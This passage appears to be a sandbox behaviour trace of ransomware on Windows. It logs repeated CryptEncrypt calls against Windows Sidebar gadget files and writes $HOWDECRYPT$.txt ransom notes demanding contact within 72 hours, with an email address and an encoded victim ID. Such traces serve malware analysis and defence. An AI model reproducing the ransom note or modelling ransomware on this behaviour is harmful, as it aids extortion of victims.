Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.994] GetProcessHeap () returned 0x2c0000 [0160.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.994] GetProcessHeap () returned 0x2c0000 [0160.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d700 | out: hHeap=0x2c0000) returned 1 [0160.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e928 | out: pbBuffer=0x270e928) returned 1 [0160.995] GetProcessHeap () returned 0x2c0000 [0160.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e920*=0x30) returned 1 [0160.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.999] GetProcessHeap () returned 0x2c0000 [0160.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.999] GetProcessHeap () returned 0x2c0000 [0160.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb10b8 | out: hHeap=0x2c0000) returned 1 [0160.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e920 | out: pbBuffer=0x270e920) returned 1 [0160.999] GetProcessHeap () returned 0x2c0000 [0160.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.999] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e918*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e918*=0x30) returned 1 [0160.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.999] GetProcessHeap () returned 0x2c0000 [0160.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.000] GetProcessHeap () returned 0x2c0000 [0161.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2d38 | out: hHeap=0x2c0000) returned 1 [0161.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.008] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.008] WriteFile (in: hFile=0x178, lpBuffer=0x270e853*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e97c, lpOverlapped=0x0 | out: lpBuffer=0x270e853*, lpNumberOfBytesWritten=0x270e97c*=0x127, lpOverlapped=0x0) returned 1 [0161.009] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.009] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e97c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e97c*=0x2ac, lpOverlapped=0x0) returned 1 [0161.010] CloseHandle (hObject=0x178) returned 1 [0161.013] GetProcessHeap () returned 0x2c0000 [0161.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0db8 | out: hHeap=0x2c0000) returned 1 [0161.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e918 | out: pbBuffer=0x270e918) returned 1 [0161.013] GetProcessHeap () returned 0x2c0000 [0161.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e910*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e910*=0x30) returned 1 [0161.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.018] GetProcessHeap () returned 0x2c0000 [0161.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.018] GetProcessHeap () returned 0x2c0000 [0161.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3bca8 | out: hHeap=0x2c0000) returned 1 [0161.018] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e918 | out: pbBuffer=0x270e918) returned 1 [0161.018] GetProcessHeap () returned 0x2c0000 [0161.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.018] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e910*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e910*=0x30) returned 1 [0161.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\rssfeeds.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.018] GetProcessHeap () returned 0x2c0000 [0161.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0bb8 | out: hHeap=0x2c0000) returned 1 [0161.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e910 | out: pbBuffer=0x270e910) returned 1 [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e908*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e908*=0x30) returned 1 [0161.019] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3bab8 | out: hHeap=0x2c0000) returned 1 [0161.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e910 | out: pbBuffer=0x270e910) returned 1 [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e908*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e908*=0x30) returned 1 [0161.019] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.019] GetProcessHeap () returned 0x2c0000 [0161.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.020] GetProcessHeap () returned 0x2c0000 [0161.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2c58 | out: hHeap=0x2c0000) returned 1 [0161.020] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.051] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.051] WriteFile (in: hFile=0x178, lpBuffer=0x270e83f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e968, lpOverlapped=0x0 | out: lpBuffer=0x270e83f*, lpNumberOfBytesWritten=0x270e968*=0x127, lpOverlapped=0x0) returned 1 [0161.052] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.052] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e968, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e968*=0x2ac, lpOverlapped=0x0) returned 1 [0161.052] CloseHandle (hObject=0x178) returned 1 [0161.052] GetProcessHeap () returned 0x2c0000 [0161.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0ab8 | out: hHeap=0x2c0000) returned 1 [0161.052] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e908 | out: pbBuffer=0x270e908) returned 1 [0161.052] GetProcessHeap () returned 0x2c0000 [0161.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.052] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e900*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e900*=0x30) returned 1 [0161.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.061] GetProcessHeap () returned 0x2c0000 [0161.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.061] GetProcessHeap () returned 0x2c0000 [0161.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89a88 | out: hHeap=0x2c0000) returned 1 [0161.061] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e900 | out: pbBuffer=0x270e900) returned 1 [0161.061] GetProcessHeap () returned 0x2c0000 [0161.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8f8*=0x30) returned 1 [0161.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.062] GetProcessHeap () returned 0x2c0000 [0161.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.062] GetProcessHeap () returned 0x2c0000 [0161.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d5e8 | out: hHeap=0x2c0000) returned 1 [0161.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e900 | out: pbBuffer=0x270e900) returned 1 [0161.062] GetProcessHeap () returned 0x2c0000 [0161.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.062] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8f8*=0x30) returned 1 [0161.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.068] GetProcessHeap () returned 0x2c0000 [0161.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.068] GetProcessHeap () returned 0x2c0000 [0161.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89980 | out: hHeap=0x2c0000) returned 1 [0161.068] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8f8 | out: pbBuffer=0x270e8f8) returned 1 [0161.068] GetProcessHeap () returned 0x2c0000 [0161.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.068] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8f0*=0x30) returned 1 [0161.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.071] GetProcessHeap () returned 0x2c0000 [0161.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.072] GetProcessHeap () returned 0x2c0000 [0161.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89668 | out: hHeap=0x2c0000) returned 1 [0161.072] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8f8 | out: pbBuffer=0x270e8f8) returned 1 [0161.072] GetProcessHeap () returned 0x2c0000 [0161.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.072] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8f0*=0x30) returned 1 [0161.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.110] GetProcessHeap () returned 0x2c0000 [0161.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.111] GetProcessHeap () returned 0x2c0000 [0161.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d3b8 | out: hHeap=0x2c0000) returned 1 [0161.111] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8f0 | out: pbBuffer=0x270e8f0) returned 1 [0161.111] GetProcessHeap () returned 0x2c0000 [0161.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.111] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8e8*=0x30) returned 1 [0161.111] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.248] GetProcessHeap () returned 0x2c0000 [0161.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.248] GetProcessHeap () returned 0x2c0000 [0161.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c830d0 | out: hHeap=0x2c0000) returned 1 [0161.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8f0 | out: pbBuffer=0x270e8f0) returned 1 [0161.248] GetProcessHeap () returned 0x2c0000 [0161.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8e8*=0x30) returned 1 [0161.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.259] GetProcessHeap () returned 0x2c0000 [0161.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.259] GetProcessHeap () returned 0x2c0000 [0161.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82d58 | out: hHeap=0x2c0000) returned 1 [0161.259] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8e8 | out: pbBuffer=0x270e8e8) returned 1 [0161.259] GetProcessHeap () returned 0x2c0000 [0161.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8e0*=0x30) returned 1 [0161.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_bottom_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_bottom_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.262] GetProcessHeap () returned 0x2c0000 [0161.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.263] GetProcessHeap () returned 0x2c0000 [0161.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c829e0 | out: hHeap=0x2c0000) returned 1 [0161.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8e8 | out: pbBuffer=0x270e8e8) returned 1 [0161.263] GetProcessHeap () returned 0x2c0000 [0161.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8e0*=0x30) returned 1 [0161.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.266] GetProcessHeap () returned 0x2c0000 [0161.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.267] GetProcessHeap () returned 0x2c0000 [0161.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3cd28 | out: hHeap=0x2c0000) returned 1 [0161.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8e0 | out: pbBuffer=0x270e8e0) returned 1 [0161.267] GetProcessHeap () returned 0x2c0000 [0161.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8d8*=0x30) returned 1 [0161.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.270] GetProcessHeap () returned 0x2c0000 [0161.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.270] GetProcessHeap () returned 0x2c0000 [0161.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb07b8 | out: hHeap=0x2c0000) returned 1 [0161.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8e0 | out: pbBuffer=0x270e8e0) returned 1 [0161.271] GetProcessHeap () returned 0x2c0000 [0161.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, 